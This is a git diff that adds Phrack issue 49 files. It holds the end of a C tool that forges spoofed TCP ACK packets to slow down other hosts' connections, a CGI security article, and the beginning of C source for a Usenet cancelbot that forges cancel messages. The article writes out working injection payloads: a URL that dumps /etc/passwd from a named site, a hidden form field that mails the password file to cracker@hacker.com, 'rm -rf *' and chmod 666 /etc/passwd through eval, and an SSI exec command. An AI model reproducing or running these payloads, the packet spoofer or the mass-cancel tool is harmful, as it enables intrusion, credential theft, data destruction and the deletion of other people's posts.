+   	/* Network reading loop */
+	while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->ack)sl0th(iphp,tcphp,shoe);
+}
+
+
+/*
+ *	Build a packet and send it off.
+ */
+
+void sl0th(iphp,tcphp,shoe)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+int shoe;
+{
+   	
+	void dump(struct iphdr *,struct tcphdr *);
+        
+        struct tpack{			/* Generic TCP packet w/o payload */
+                struct iphdr ip;	
+                struct tcphdr tcp;
+        }tpack;                
+        
+        struct pseudo_header{           /* For TCP header checksum */
+                unsigned source_address;
+                unsigned dest_address;
+                unsigned char placeholder;
+                unsigned char protocol;
+                unsigned short tcp_length;
+                struct tcphdr tcp;
+        }pheader;
+  
+   	struct sockaddr_in sin;         /* IP address information */
+                        		/* Setup the sin struct with addressing information */
+      	sin.sin_family=AF_INET;  	/* Internet address family */
+        sin.sin_port=tcphp->dest;       /* Source port */
+        sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */
+
+                        /* Packet assembly begins here */
+        
+                                /* Fill in all the TCP header information */
+
+        tpack.tcp.source=tcphp->dest;   /* 16-bit Source port number */
+        tpack.tcp.dest=tcphp->source;   /* 16-bit Destination port */
+        tpack.tcp.seq=htonl(ntohl(tcphp->ack_seq));    /* 32-bit Sequence Number */
+        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq));    /* 32-bit Acknowledgement Number */
+        tpack.tcp.doff=5;              	/* Data offset */
+        tpack.tcp.res1=0;              	/* reserved */
+        tpack.tcp.res2=0;              	/* reserved */
+      	tpack.tcp.urg=0;               	/* Urgent offset valid flag */
+        tpack.tcp.ack=1;               	/* Acknowledgement field valid flag */
+        tpack.tcp.psh=0;               	/* Push flag */
+        tpack.tcp.rst=0;               	/* Reset flag */
+        tpack.tcp.syn=0;               	/* Synchronize sequence numbers flag */
+        tpack.tcp.fin=0;               	/* Finish sending flag */
+        tpack.tcp.window=htons(SLOTHWINDOW);	 /* 16-bit Window size */
+        tpack.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
+        tpack.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
+        
+                                /* Fill in all the IP header information */
+        
+        tpack.ip.version=4;            	/* 4-bit Version */
+        tpack.ip.ihl=5;                	/* 4-bit Header Length */
+        tpack.ip.tos=0;                	/* 8-bit Type of service */
+    	tpack.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
+        tpack.ip.id=0;         		/* 16-bit ID field */
+        tpack.ip.frag_off=0;           	/* 13-bit Fragment offset */
+        tpack.ip.ttl=64;	        /* 8-bit Time To Live */
+        tpack.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
+        tpack.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
+        tpack.ip.saddr=iphp->daddr;    	/* 32-bit Source Address */
+        tpack.ip.daddr=iphp->saddr;    	/* 32-bit Destination Address */
+        
+        pheader.source_address=(unsigned)tpack.ip.saddr;
+        pheader.dest_address=(unsigned)tpack.ip.daddr;
+        pheader.placeholder=0;
+     	pheader.protocol=IPPROTO_TCP;
+        pheader.tcp_length=htons(TCPHDR);
+        
+     			/* IP header checksum */
+        
+      	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
+                
+			/* TCP header checksum */
+                                
+        bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
+       	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);
+
+	sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
+#ifndef QUIET
+	dump(iphp,tcphp);
+#endif
+}
+
+/* 
+ *	Dumps some info...
+ */
+
+void dump(iphp,tcphp)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+{
+	fprintf(stdout,"Hmm... I smell an ACK: ");
+   	fprintf(stdout,"%s [%d] --> %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); 
+	fprintf(stdout,"let's slow things down a bit\n");
+}
+
+
+-------------------------------8<-------cut-me-loose--------------------------
+
+
+/*
+		Basic Linux Networking Header Information. v1.0
+
+   		   c. daemon9, Guild Corporation 1996
+
+Includes:
+
+	tap
+	in_cksum
+	nameResolve
+	hostLookup	
+	shadow
+	reaper
+
+	This is beta.  Expect it to expand greatly the next time around ...
+	Sources from all over the map.
+
+		code from:
+			route
+			halflife
+*/
+
+#include <string.h>
+#include <signal.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <syslog.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <arpa/inet.h>
+#include <linux/socket.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/if_ether.h>
+#include <linux/if.h>
+
+#define DEVICE 		"eth0"
+#define BUFSIZE 	256
+#define ETHHDR 		14
+#define TCPHDR 		20
+#define IPHDR  		20
+#define ICMPHDR 	8
+
+
+/*
+ *      IP address into network byte order
+ */
+                 
+unsigned nameResolve(char *hostname){
+        
+        struct in_addr addr;
+        struct hostent *hostEnt; 
+   
+        if((addr.s_addr=inet_addr(hostname))==-1){
+                if(!(hostEnt=gethostbyname(hostname))){
+                        fprintf(stderr,"Name lookup failure: `%s`\n",hostname);
+                        exit(0);
+                }
+                bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
+        }
+        return addr.s_addr;
+}
+ 
+/*
+ *      IP Family checksum routine
+ */
+
+unsigned short in_cksum(unsigned short *ptr,int nbytes){
+                        
+        register long           sum;            /* assumes long == 32 bits */
+        u_short                 oddbyte;
+        register u_short        answer;         /* assumes u_short == 16 bits */
+                        
+        /*
+         * Our algorithm is simple, using a 32-bit accumulator (sum),
+         * we add sequential 16-bit words to it, and at the end, fold back 
+         * all the carry bits from the top 16 bits into the lower 16 bits. 
+         */
+        
+        sum = 0;
+        while (nbytes > 1)  {
+                sum += *ptr++;
+                nbytes -= 2;    
+        }
+                        
+                                /* mop up an odd byte, if necessary */
+        if (nbytes == 1) {
+                oddbyte = 0;            /* make sure top half is zero */
+                *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
+                sum += oddbyte;
+        }               
+  
+        /*
+         * Add back carry outs from top 16 bits to low 16 bits.
+         */
+         
+        sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
+        sum += (sum >> 16);                     /* add carry */
+        answer = ~sum;          /* ones-complement, then truncate to 16 bits */
+        return(answer);
+}
+
+
+/*
+ *	Creates a low level raw-packet socket and puts the device into promiscuous mode.
+ */
+
+int tap(device)
+char *device;
+{
+	
+	int fd;				/* File descriptor */
+   	struct ifreq ifr;		/* Link-layer interface request structure */
+					/* Ethernet code for IP 0x800==ETH_P_IP */
+   	if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){	/* Linux's way of */ 
+      		perror("SOCK_PACKET allocation problems");	/* getting link-layer */
+      		exit(1);					/* packets */
+   	}
+	strcpy(ifr.ifr_name,device);				
+   	if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){			/* Get the device info */
+      		perror("Can't get device flags");
+      		close(fd);
+      		exit(1);
+   	}
+   	ifr.ifr_flags|=IFF_PROMISC;				/* Set promiscuous mode */
+   	if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){			/* Set flags */
+		perror("Can't set promiscuous mode");
+   		close(fd);
+		exit(1);
+	}
+	return(fd);
+}
+
+/*
+ *	Network byte order into IP address
+ */
+
+char *hostLookup(in)
+unsigned long in;
+{
+ 
+   	char hostname[BUFSIZE];
+   	struct in_addr addr;
+   	struct hostent *hostEnt;
+   
+	bzero(&hostname,sizeof(hostname));
+	addr.s_addr=in;
+   	hostEnt=gethostbyaddr((char *)&addr, sizeof(struct in_addr),AF_INET);
+   	if(!hostEnt)strcpy(hostname,inet_ntoa(addr));
+   	else strcpy(hostname,hostEnt->h_name);
+   	return(strdup(hostname));
+}
+ 
+/*
+ *      Simple daemonizing procedure.
+ */   
+
+void shadow(void){
+
+        int fd,fs;
+        extern int errno;
+     	char werd[]={"\n\n\n\nHades is a Guild Corporation Production.  c.1996\n\n"}; 
+
+        signal(SIGTTOU,SIG_IGN);        /* Ignore these signals */
+        signal(SIGTTIN,SIG_IGN);
+        signal(SIGTSTP,SIG_IGN);
+	printf(werd);
+
+        switch(fork()){
+               case 0:                 /* Child */
+                        break;
+                default:        
+                        exit(0);        /* Parent */
+                case -1:
+                        fprintf(stderr,"Forking Error\n");
+                        exit(1);
+        }
+        setpgrp();
+        if((fd=open("/dev/tty",O_RDWR))>=0){
+                ioctl(fd,TIOCNOTTY,(char *)NULL);
+                close(fd);
+        }
+        /*for(fd=0;fd<NOFILE;fd++)close(fd);*/
+        errno=0;
+        chdir("/");
+        umask(0);
+}
+
+/*
+ *      Keeps processes from zombiing on us...
+ */
+        
+static void reaper(signo)
+int signo;
+{
+        pid_t pid;
+        int sys;
+
+        pid=wait(&sys); 
+        signal(SIGCHLD,reaper);
+        return;
+}
+
+
+-------------------------------8<-------cut-me-loose--------------------------
+
+EOF
+
diff --git a/phrack49/8.txt b/phrack49/8.txt
new file mode 100644
index 0000000..28b70c1
--- /dev/null
+++ b/phrack49/8.txt
@@ -0,0 +1,241 @@
+                                .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+                                     
+                                   File 08 of 16
+
+				CGI Security Holes
+--------------------------------------------------------------------------
+				by Gregory Gilliss
+
+
+	This article will discuss the Common Gateway Interface, its 
+relationship to the World Wide Web and the Internet, and will endeavor to 
+point out vulnerabilities in system security exposed by its use.  The UNIX 
+operating system will be the platform central to this discussion.  
+Programming techniques will be illustrated by examples using PERL.  
+
+1.	Introduction
+
+	The Common Gateway Interface (CGI) is an interface specification that
+allows communication between client programs and information servers which 
+understand the Hyper-Text Transfer Protocol (HTTP).  TCP/IP is the 
+communications protocol used by the CGI script and the server during the 
+communications.  The default port for communications is port 80 (privileged),
+but other non-privileged ports may be specified.
+
+	CGI scripts can perform relatively simple processing on the client 
+side.  A CGI script can be used to format Hyper-Text Markup Language (HTML) 
+documents, dynamically create HTML documents, and dynamically generate 
+graphical images.  CGI can also perform transaction recording using standard 
+input and standard output.  CGI stores information in system environment 
+variables that can be accessed through the CGI scripts.  CGI scripts can also
+accept command line arguments.  CGI scripts operate in two basic modes:  
+
+	- In the first mode, the CGI script performs rudimentary data 
+processing on the input passed to it.  An example of data processing is the 
+popular web lint page that checks the syntax of HTML documents.  
+
+	- The second mode is where the CGI script acts as a conduit for data 
+being passed from the client program to the server, and back from the 
+server to the client.  For example, a CGI script can be used as a front end 
+to a database program running on the server.  
+
+	CGI scripts can be written using compiled programming languages, 
+interpreted programming languages, and scripting languages.  The only real 
+advantage that exists for one type of development tool over the other is that
+compiled programs tend to execute more quickly than interpreted programs.  
+Interpreted languages such as AppleScript, TCL, PERL and UNIX shell scripts 
+afford the possibility of acquiring and modifying the source (discussed 
+later), and are generally faster to develop than compiled programs.  
+
+	The set of common methods available to CGI programs is defined in 
+the HTTP 1.0 specification.  The three methods pertinent to this discussion 
+are the `Get` method, the `Post` method, and the `Put` method.  The `Get` 
+method retrieves information from the server to the client.  The `Post` 
+method asks the server to accept information passed from the client as input 
+to the specified target. The `Put` method asks the server to accept 
+information passed from the client as a replacement for the specified target.
+
+2.	Vulnerabilities
+
+	The vulnerabilities caused by the use of CGI scripts are not 
+weaknesses in CGI itself, but are weaknesses inherent in the HTTP 
+specification and in various system programs.  CGI simply allows access to 
+those vulnerabilities.  There are other ways to exploit the system security.
+For example, insecure file permissions can be exploited using FTP or telnet.
+CGI simply provides more opportunities to exploit these and other security 
+flaws.
+
+	The CGI specification provides opportunities to read files, acquire 
+shell access, and corrupt file systems on server machines and their attached 
+hosts.  Means of gaining access include: exploiting assumptions of the 
+script, exploiting weaknesses in the server environment, and exploiting 
+weaknesses in other programs and system calls.  The primary weakness in 
+CGI scripts is insufficient input validation.
+
+	According to the HTTP 1.0 specification, data passed to a CGI script 
+must be encoded so that it can work on any hardware or software platform.  
+Data passed by a CGI script using the Get method is appended to the end of a 
+Universal Resource Locator (URL).  This data can be accessed by the CGI 
+script as an environment variable named QUERY_STRING.  Data is passed as 
+tokens of the form variable=value, with the tokens separated by ampersands 
+(&).  Actual ampersands, and other non-alphanumeric characters, must be 
+escaped, meaning that they are encoded as two-digit hexadecimal values.  
+Escaped characters are preceded by a percent sign (%) in the encoded URL.  It
+is the responsibility of the CGI script to escape or remove characters in 
+user supplied input data.  Characters such as '<' and '>', the delimiters for
+HTML tags, are usually removed using a simple search and replace operation, 
+such as the following:
+
+----------------8<----------------------------------------------------------
+
+# Process input values
+{$NAME, $VALUE) = split(/=/, $_);	# split up each variable=value pair
+$VALUE =~ s/\+/ /g;			# Replace '+' with ' '
+$VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg;  # Replace %xx characters with ASCII
+# Escape metacharacters
+$VALUE =~ s/([;<>\*\|'&\$!#\(\)\[\]\{\}:"])/\\$1/g;# remove unwanted special characters
+$MYDATA[$NAME} = $VALUE;	# Assign the value to the associative array
+
+----------------8<----------------------------------------------------------
+
+	This example removes special characters such as the semi-colon 
+character, which is interpreted by the shell as a command separator.  
+Inclusion of a semi-colon in the input data allows for the possibility 
+of appending an additional command to the input.  Take note of the forward 
+slash characters that precede the characters being substituted.  In PERL, a 
+backslash is required to tell the interpreter not to process the following 
+character.*
+
+	The above example is incomplete since it does not address the 
+possibility of the new line character '%0a', which can be used to execute 
+commands other than those provided by the script.  Therefore it is possible to 
+append a string to a URL to perform functions outside of the script.  For 
+example, the following URL requests a copy of /etc/passwd from the server 
+machine:
+
+http://www.odci.gov/cgi-bin/query?%0a/bin/cat%20/etc/passwd
+
+The strings '%0a" and '%20' are ASCII line feed and blank respectively.
+
+	The front end interface to a CGI program is an HTML document called a 
+form.  Forms include the HTML tag <INPUT>.  Each <INPUT> tag has a variable 
+name associated with it.  This is the variable name that forms the left hand 
+side of the previously mentioned variable=value token.  The contents of the 
+variable forms the value portion of the token.  Actual CGI scripts may 
+perform input filtering on the contents of the <INPUT> field.  However if the
+CGI script does not filter special characters, then a situation analogous to 
+the above example exists.  Interpreted CGI scripts that fail to validate the 
+<INPUT> data will pass the data directly to the interpreter. **
+
+	Another HTML tag sometime seen in forms is the <SELECT> tag.  
+<SELECT> tags allow the user on the client side to select from a finite set 
+of choices.  The selection becomes the right hand side of the variable=value 
+token passed to the CGI script.  CGI script often fail to validate the 
+input from a <SELECT> field, assuming that the field will contain only 
+pre-defined data.  Again, this data is passed directly to the interpreter for
+interpreted languages.  Compiled programs which do not perform input 
+validation and/or escape special characters may also be vulnerable.
+
+	A shell script or PERL script that invokes the UNIX mail program may 
+be vulnerable to a shell escape.  Mail accepts commands of the form 
+'~!command' and forks a shell to execute the command.  If the CGI 
+script does not filter out the '~!' sequence, the system is vulnerable.  
+Sendmail holes can likewise be exploited in this manner.  Again, the key is 
+to find a script that does not properly filter input characters.
+
+	If you can find a CGI script that contains a UNIX system() call with 
+only one argument, then you have found a doorway into the system.  When the 
+system() function is invoked with only one argument, the system forks a 
+separate shell to handle the request.  When this happens, it is possible to 
+append data to the input and generate unexpected results.  For example, a 
+PERL script containing the following:
+
+system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file");
+
+is designed to mail a copy of $input_file to the mail address specified in 
+the $mailto_address variable.  By calling system() with one argument, the 
+program causes a separate shell to be forked.  By copying and modifying the 
+input to the form:
+
+<INPUT TYPE="HIDDEN" NAME="mailto_address" 
+VALUE="address@server.com;mail cracker@hacker.com </etc/passwd">
+
+we can exploit this weakness and obtain the password file from the server. ***
+
+	The system() function is not the only command that will fork a new 
+shell.  the exec() function with a single argument also provides the same 
+exposure.  Opening a file and piping the result also forks a separate shell.  
+In PERL, the function:
+
+open(FILE, "| program_name $ARGS");
+
+will open FILE and pipe the contents to program_name, which will run as a 
+separate shell.
+
+	In PERL, the eval command parses and executes whatever argument is 
+passed to it.  CGI scripts that pass arbitrary user input to the eval command
+can be used to execute anything the user desires.  For example, 
+
+$_ = $VALUE;
+s/"/\\"/g		# Escape double quotes
+$RESULT = eval qq/"$_"/;	# evaluate the correctly quoted input
+
+would pass the data from $VALUE to eval essentially unchanged, except for 
+ensuring that the double quote don't confuse the interpreter (how nice of 
+them).  If $VALUE contains "rm -rf *", the results will be disastrous.  File 
+permissions should be examined carefully.  CGI scripts that are world 
+readable can be copied, modified, and replaced.  In addition, PERL scripts 
+that include lines such as the following:
+
+require "cgi-lib";
+
+are including a library file named cgi-lib.  If this file's permissions are 
+insecure, the script is vulnerable.  To check file permissions, the string 
+'%0a/bin/ls%20-la%20/usr/src/include" could be appended to the URL of a CGI 
+script using the Get method.
+
+	Copying, modifying, and replacing the library file will allow users 
+to execute command or routines inside the library file.  Also, if the PERL 
+interpreter, which usually resides in /usr/bin, runs as SETUID root, it is 
+possible to modify file permissions by passing a command directly to the 
+system through the interpreter.  The eval command example above would permit 
+the execution of :
+
+$_ = "chmod 666 \/etc\/passwd"
+$RESULT = eval qq/"$_"/;
+
+which would make the password file world writable.
+
+	There is a feature supported under some HTTPD servers called Server 
+Side Includes (SSI).  This is a mechanism that allows the server to modify 
+the outgoing document before sending it to the client browser.  SSI is a 
+*huge* security hole, and most everyone except the most inexperienced 
+sysadmin has it disabled.  However, in the event that you discover a site 
+that enables SSI,, the syntax of commands is:
+
+<!--#command variable="value" -->
+
+Both command and 'tag' must be lowercase.  If the script source does not 
+correctly filter input,input such as:
+
+<!--#exec cmd="chmod 666 /etc/passwd"--> 
+
+	All SSI commands start with a pound sign (#) followed by a keyword.  
+"exec cmd" launches a shell that executes a command enclosed in the double 
+quotes.  If this option is turned on, you have enormous flexibility with what
+you can do on the target machine.
+
+3.	Conclusion
+
+	The improper use of CGI scripts affords users a number of 
+vulnerabilities in system security.  Failure to validate user input, poorly 
+chosen function calls, and insufficient file permissions can all be exploited
+through the misuse of CGI.
+
+
+
+*   Adapted from Mudry, R. J., Serving The Web, Coriolis Group Books, p. 192
+**  Jennifer Myers, Usenet posting
+*** Adapted from Phillips, P., Safe CGI Programming, 
diff --git a/phrack49/9.txt b/phrack49/9.txt
new file mode 100644
index 0000000..60448db
--- /dev/null
+++ b/phrack49/9.txt
@@ -0,0 +1,1704 @@
+                            .oO Phrack Magazine Oo.
+
+                        Volume Seven, Issue Forty-Nine
+			
+			         File 09 of 16
+
+      			  by Dr.Dimitri Vulis (KOTM)
+
+               A Content-Blind Cancelbot for Usenet (CBCB)
+
+Usenet News is a popular system for transmitting articles. Historically it
+used to propagate over UUCP. However today most of the transmission is done
+over the Internet TCP/IP connections using the NNTP protocol (RFC 977).
+
+Each article consists of a series of headers of the form
+Keyword: value
+followed by a blank line, followed by the body of the message.
+Some required headers are self-explanatory: From:, Date:, Subject:.
+
+The Newsgroups: header identifies a series of keywords that can be used
+to search for articles in the newsfeed. For example:
+Newsgroups: news.admin.policy,comp.lang.c
+identifies a Usenet article relevant to both Usenet administrative policy
+and to the C computer language.
+
+The Message-Id: header uniquely identifies each article. For example:
+Message-Id: <12341223@whitehouse.gov>
+The message-ids are not supposed to be recycled.
+
+The cancelbot program is supposed to search the user-specified newsgroups for
+articles whose headers match user-specified regular expressions and to issue
+special 'cancel' control articles. It will copy some of the headers from the
+original message and add a special header:
+Control: cancel <message-id>
+
+This program is an NNTP client. Much of the processing is offloaded to an
+NNTP server, to which the cancelbot talks using the Internet sockets protocol.
+
+This cancelbot does not look at article bodies and is therefore content-blind.
+
+Inputs:
+
+argv[1] (required) hosts file
+
+A line that starts with # is a comment. Otherwise, each line contains the
+following 5 fields:
+
+1. hostname (some.domain.com) or ip address (a.b.c.d)
+2. port (normally 119)
+3. Y/N - do we ask this host for NEWNEWS/HEADER?
+4. I/P/N - do we inject cancels to this host with IHAVE, POST, not at all
+5. Timeout - the number of seconds to wait for a response from this server.
+
+Example of a hosts file:
+
+# ask the local server for new news and post back the cancels
+127.0.0.1 119 Y P 60
+# don't get message-ids from remote server, but give it cancels via IHAVE
+news.xx.net 119 N I 300
+
+
+argv[2] (required) target file
+
+A line that starts with # is a comment. Otherwise, each line contains the
+following 9 fields:
+
+1. List of newsgroups to be scanned for new messages. This is not interpreted
+by the cancelbot, but passed on to the NNTP server. Per RFC 997, multiple
+groups can be separated by commas. Asterisk "*" may be used to match multiple
+newsgroup names. The exclamation point "!" (as the first character) may be used
+to negate a match. Warning: specifying a single * will generate a lot of data.
+
+Example: news.groups,comp.*,sci.*,!sci.math.*
+
+2. A watchword (case-sensitive) that needs to be contained in the article
+headers for the cancel to be issued.
+
+3. Format of the Subject: header in the cancel article.
+ C - Subject cancel <message-id> (same as Control:)
+ O - Subject: header copied from the original article
+ N - none.
+If N is specified, then Subject: MUST be provided in the file appended to
+the header, or the cancel won't propagate.
+
+4. cancel message-id prefix
+ normally cancel. or cn.
+
+Most cancellation articles follow the so-called $alz convention:
+Control: cancel <message.id>
+Message-id: <cancel.message.id>
+However this is not a requirement.
+
+5. path constant (string to put in path). May be 'none'.
+6. path copy # (number of elements to copy from the right, may be 0)
+
+Explanation of these two parameters:
+each Usenet article contains the "Path:" header with a list of hosts separated
+by explanation marks. For example:
+Path: ohost1!ohost2!ohost3!ohost4
+If you specify path constant of "nhosta!nhostb" and path copy of 2
+then the path written by cbcb will be
+Path: nhosta!nhostb!ohost3!ohost4
+
+7. Name of the file appended to the header or 'none'
+
+Examples:
+
+# should be supplied as a courtesy
+X-Cancelled-By: Cancelbot
+# if and only if target file field 3 contains 'N':
+Subject: Cancelling a Usenet article
+# only if posting via IHAVE:
+NNTP-Posting-Host: usenet.cabal.org
+
+8. Name of the file that will become the body of the cancel or 'none'
+
+If 'none' is specified, the default will be
+"Please cancel this article."
+
+9. The string to be prepended to the newsgroups. Normally 'none',
+but may be set to something like misc.test (or misc.test,alt.test).
+
+Example of a target file:
+
+# delete all articles that mention C++ (but not c++)
+comp.lang.c.* C++ C cancel. cyberspam 3 can.hdr none none
+# no sex in the sci hierarchy, and add misc.test to the cancel
+sci.* sex C cn. plutonium 2 can1.hdr can.txt misc.test
+
+argv[3] (optional) datestamp, YYMMDD. If not specified, default is 900101. Only
+articles after this date are examined. This parameter is not processed by the
+cancelbot, but passed on to the NNTP server. It should normally be specified
+so as not to look at old Usenet articles.
+
+argv[4] (optional) timestamp, digits HHMMSS, where HH is hours on the 24-hour
+clock, MM is minutes 00-59, and SS is seconds 00-59. If not specified, default
+is 000000. Note that both datestamp and timestamp are in Greenwich mean time.
+
+---------------8<-------cut me loose!-------------->8--------------------------
+ed-note:
+To compile, you must define an OS type (under gcc, this is accomplished using
+the -Dmacro directive).  Under Unix, for example:
+gcc -DCBCB_UNIX -o cancelbot cbcb.c
+
+---------------8<-------cut me loose!-------------->8--------------------------
+
+cbcb.c:
+/*
+
+Context-blind CancelBot 0.9 04/01/96
+
+Description of operations:
+
+Open socket connections to the hosts listed in the hosts file
+
+loop on targets
+ {
+ loop on servers
+  {
+  if (newnews_flag=='Y')
+   {
+   send NEWNEWS newsgroups datestamp timestamp GMT to this socket
+   receive a list of message-ids and save them in a LIFO linked list
+   loop on message-ids
+     {
+     send HEADER message-id to this server's socket
+     receieve a header
+     if the header contains the watchword
+      {
+      compose a cancel according to the target file specifications
+      loop on servers
+       {
+       if post_flag is P or I
+        send the cancel to this server's socket using posting method
+       }
+      }
+     delete this message-id from the linked list
+     }
+    }
+   }
+  }
+
+*/
+
+#ifndef CBCB_UNIX
+#ifndef CBCB_VMS
+#ifndef CBCB_NT
+#ifndef CBCB_OS2
+#error One of (CBCB_UNIX, CBCB_VMS, CBCB_NT, CBCB_OS2) must be defined
+#endif
+#endif
+#endif
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <string.h>
+#include <ctype.h>
+
+/* various flavors of Unix */
+
+#ifdef CBCB_UNIX
+/* gcc -DCBCB_UNIX cbcb.c -o cbcb */
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+/* perror to be called after failed socket calls */
+#define perror_sock perror
+/* how to close a socket */
+#define close_sock close
+#endif
+
+/* Windows NT, /subsystem:console. The executable is supposed to work
+under NT and Windows 95, but not under Win32s. */
+
+#ifdef CBCB_NT
+/* important note: when compiling on NT, say something like
+ cl /DCBCB_NT /Ogaityb1 /G5Fs /ML cbcb.c wsock32.lib */
+#include <winsock.h>
+/* regular perror doesn't work with WinSock under NT */
+#define perror_sock(s) fprintf(stderr,"%s : WinSock error %d\n",s,WSAGetLastError())
+/* regular close doesn't work with WinSock under NT */
+#define close_sock closesocket
+/* NT doesn't understand unix-style sleep in seconds */
+#define sleep(n) Sleep(n*1000)
+#endif
+
+/* DEC VAX/VMS */
+
+#ifdef CBCB_VMS
+/* important note: when compiling on VAX/VMS, say something like
+ cc/define=CBCB_VMS cbcb/nodebug/optimize=(disjoint,inline)
+ link cbcb/nouserlib/notraceback,sys$library:ucx$ipc.olb/lib,-
+  sys$library:vaxcrtl.olb/lib
+   (to link in shared routines)
+  */
+#include <types.h>
+#include <socket.h>
+#include <netdb.h>
+#include <in.h>
+#include <inet.h>
+#include <time.h>
+#include <unixio.h>
+#define perror_sock perror
+#define close_sock close
+#endif
+
+/* IBM OS/2  - link with tcpip.lib */
+
+#ifdef CBCB_OS2
+#define OS2
+/* we will use a BSD-like select, not Oleg's hack */
+#define BSD_SELECT
+#define INCL_DOSPROCESS
+#include <bsedos.h> /* DosSleep */
+#include <sys\types.h>
+#include <sys\socket.h>
+#include <sys\select.h>
+#include <netinet\in.h>
+/*#include <arpa\inet.h>*/
+#include <netdb.h>
+/* perror to be called after failed socket calls */
+#define perror_sock fprintf(stderr,"%s : tcp error %d\n",s,tcperrno())
+/* how to close a socket */
+#define close_sock soclose
+#define sleep(n) DosSleep(n/1000)
+#endif
+
+/*
+
+Future Macintosh notes: Need Apple's MPW (Macintosh Programmer's Workshop).
+Build CBCB as an MPW tool. Set the Macintosh file type to MPST and the
+Macintosh creator to MPS, so we can use stdout and stderr.
+
+Sockets are supposed to be available on the Mac.
+
+*/
+
+#ifndef FD_ZERO
+/* macros for select() not defined on VAX or HPUX
+However they are defined to be something completely different
+under NT WinSock, so we must use macros */
+#define fd_set int
+#define FD_ZERO(p) {*(p)=0;}
+#define FD_SET(s,p) {*(p)|=(1<<(s));}
+#define FD_ISSET(s,p) ((*(p)&(1<<(s)))!=0)
+#endif
+
+/* file pointers */
+FILE *sptr, /* hosts file */
+     *tptr; /* target file*/
+
+/* there's a reason for making all these variables static. If I weren't lazy,
+I would have put them in their respective functions with 'static' */
+
+#define MAXHOSTS 100
+
+struct {
+int cfd; /* socket handle */
+char newnews_flag;
+char post_flag;
+int timeout;
+} hosts[MAXHOSTS];
+int nhosts;
+
+short int port;
+
+#define ASCII_CR 13
+#define ASCII_LF 10
+
+#define BUFFERSIZE 2048
+
+#define BUFFERBIGSIZE 20480
+char buffer_big[BUFFERBIGSIZE];
+
+struct _msgidq {
+char *msgid;
+struct _msgidq *next;
+};
+
+struct _msgidq *msg_queue,*msg_t;
+
+int parse_state, /* for parsing server responses */
+ h_flag,d_flag; /* shortcut for states when parsing headers */
+
+char hostname[BUFFERSIZE];
+char buffer[BUFFERSIZE];
+char extra_header[BUFFERSIZE];
+char extra_body[BUFFERSIZE];
+int file_rec;
+char newsgroups[BUFFERSIZE];       /* target field 1 */
+char watchword[BUFFERSIZE];        /* target field 2 */
+char subject_flag;                 /* target field 3 */
+char cmsg_id_prefix[BUFFERSIZE];   /* target field 4 */
+char path_const[BUFFERSIZE];       /* target field 5 */
+int  path_num;                     /* target field 6 */
+char hdr_fname[BUFFERSIZE];        /* target field 7 */
+char txt_fname[BUFFERSIZE];        /* target field 8 */
+char extra_ngrp[BUFFERSIZE];         /* target field 9 */
+
+char *datestamp,*timestamp; /* for the NEWNEWS command */
+char *sznone="none";
+char *szcabal=" Usenet@Cabal";
+char *szsubject="Subject:";
+char *szsubjectc="Subject: cmsg";
+char *szendl="\r\n";
+char *szempty="";
+
+int nretry; /* number of retries in various places */
+int nbytes;
+int host1,host2,i,j;   /* loop indices */
+
+#define NOLDHEADERS 8
+/* We're interested in 8 original headers :
+
+Path:               0         (requires special handling)
+From:               1
+Sender:             2
+Approved:           3
+Newsgroups:         4
+Date:               5
+Subject:            6
+Organization:       7
+
+*/
+
+char *h_ptr[NOLDHEADERS];
+char *t_ptr[3];
+
+/* ANSI function prototypes */
+int cbcb_parse_hosts(void);
+int cbcb_parse_targets(void);
+int cbcb_process_target(void);
+int cbcb_parse_message_ids(void);
+int cbcb_process_article(char *);
+int cbcb_get_headers(void);
+void cbcb_save_headers(void);
+void cbcb_save_header(int);
+int cbcb_flush_sock(int);
+int cbcb_test_sock(int);
+int cbcb_recv_resp(int,char);
+int cbcb_copy_buffer(char *);
+
+int main(int argc,char*argv[])
+{
+
+/* process the arguments */
+
+if (argc<3 || argc>5)
+ {
+ fprintf(stderr,"Usage: cbcb hostfile targetfile [datestamp] [timestamp]\n");
+ return(1);
+ }
+
+if (argc<4)
+ datestamp="900101";
+else
+ datestamp=argv[3];
+
+if (argc<5)
+ timestamp="000000";
+else
+ timestamp=argv[4];
+
+/* open the hosts file */
+
+if (NULL==(sptr=fopen(argv[1],"r")))
+ {
+ perror("open()");
